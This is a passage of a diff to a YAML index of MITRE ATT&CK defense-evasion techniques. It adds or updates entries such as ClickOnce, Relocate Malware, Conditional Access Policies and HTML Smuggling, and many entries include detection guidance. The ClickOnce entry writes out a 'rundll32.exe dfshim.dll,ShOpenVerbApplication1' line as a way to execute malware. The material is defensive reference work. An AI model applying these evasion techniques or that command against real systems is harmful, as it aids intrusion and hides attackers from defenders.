       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11588,6 +11724,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11599,13 +11736,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11650,9 +11787,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests: []
   T1564.003:
@@ -11735,18 +11869,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -11779,10 +12035,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -11819,40 +12074,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11861,20 +12086,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -11904,7 +12159,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11947,8 +12202,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -11995,7 +12248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -12061,12 +12314,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12121,33 +12372,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12168,6 +12470,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12182,22 +12485,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12255,48 +12578,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12318,6 +12610,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12328,23 +12621,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
